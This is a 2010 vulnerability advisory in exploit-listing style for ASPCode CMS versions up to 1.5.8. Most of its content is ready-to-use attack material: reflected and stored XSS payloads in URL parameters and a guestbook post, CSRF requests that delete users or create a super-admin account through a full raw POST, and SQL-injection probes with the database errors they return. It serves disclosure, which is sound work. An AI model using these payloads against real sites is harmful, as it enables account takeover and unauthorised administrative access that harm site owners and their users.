ASPCode CMS <= v1.5.8 [ Multiple Vulnerabilities ]

[+] [SOFTWARE] :: ASPCode CMS

[+] [SOFTWARE SITE] :: www.aspcodecms.com

[+] [VERSION] :: <= v1.5.8

[+] [DATE] :: 01 January 2010

[+] [AUTHOR] :: Alberto Fontanella (Fulgur Security)

 

[ 1 ] - [ Multiple XSS Vulnerabilities ]

http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>
http://[host]/default.asp?sec=1&tag="><script>alert("XSS");</script>
http://[host]/default.asp?sec=1&ma2="><script>alert("XSS");</script>

XSS found also on Form to reset password: http://[host]/default.asp?sec=33&ma1=forgotpass Put XSS String in Email Field and Submit it  

[ 2 ] - [ Persistent XSS ]

Post in Guestbook Section:

http://[host]/default.asp?sec=23

<img src="http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>"></img>  

[ 3 ] - [ CSRF ]

To Delete an User Account

http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=delete&idx=50

To Create a Super Admin Account

POST /default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=update&idx=-1 HTTP/1.1

Host: [host]

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)

Content-Type: application/x-www-form-urlencoded

Content-Length: 140


username=HAXOR&password=PASSWD&old_password=&password_is_encrypted=false&email=HAXOR%40BLACKHAT.ORG&roleId=4&redirsectionid=0&confirmed=true

You can use CSRF + XSS (Very Dangerous)  

[ 4 ] - [ Possible SQL Injection ]

http://[host]/default.asp?sec=64&ma1=tag&tag=CMS'

Output: Errore numero: -2147217900 Errore: Errore di sintassi (operatore mancante) nell'espressione della query '[ID] IN ()'.
Query: SELECT * FROM [section] s WHERE [ID] IN ()
http://[host]/default.asp=sec=1'
Errore di run-time di Microsoft VBScript (0x800A000D) Tipo non corrispondente: 'sectionID' /include/api.asp, line 657
 

[ EOF ]